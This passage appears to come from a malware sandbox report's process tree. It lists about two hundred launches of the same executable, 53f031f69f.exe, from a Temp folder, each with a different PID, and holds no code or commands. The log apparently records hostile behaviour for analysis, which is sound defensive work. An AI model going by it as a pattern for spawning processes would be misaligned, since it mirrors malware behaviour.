      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10008
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10016
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10024
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10032
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10040
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10048
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10056
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10064
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10068
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10088
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10096
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10104
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10120
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10140
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6176
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6384
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10160
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10156
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10176
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5132
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5728
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5148
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10188
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10196
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10204
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:772
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4920
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6688
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5040
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5780
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10216
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1188
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6916
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:964
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3248
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10080
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1400
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4780
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1476
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6564
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6524
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6516
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6584
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6592
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6604
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6612
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6636
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6628
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6708
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6696
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6740
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6920
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6936
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6412
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6476
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6448
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6436
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4280
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1040
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6504
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5368
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5136
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6172
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6264
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6292
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1412
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6288
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6280
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6336
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6316
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6324
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6328
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6340
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6376
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6432
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6352
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:5248
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2376
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6684
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6392
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6484
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6944
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6016
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6876
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1672
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:4044
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2668
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:2444
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:1140
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:3200
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:816
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10112
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6148
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:9264
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:6268
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:872
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10248
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10256
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10264
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10272
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10280
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10288
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10296
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10304
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10312
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10320
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10328
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10336
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10344
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10352
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10360
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10368
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10376
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10384
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10392
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10400
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10408
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10416
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10424
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10432
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10440
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10448
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10456
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10464
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10472
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10480
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10488
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10496
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10504
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10512
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10520
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10528
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10536
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10544
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10552
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10560
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10568
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10576
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10584
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10592
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10600
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10608
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10616
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10624
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10632
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10640
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10648
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10656
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10664
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10672
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10680
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10688
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10696
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10704
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10712
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10720
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10728
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10736
  - - C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe
      "C:\Users\Admin\AppData\Local\Temp\1016275001\53f031f69f.exe"
      4⤵
      PID:10744
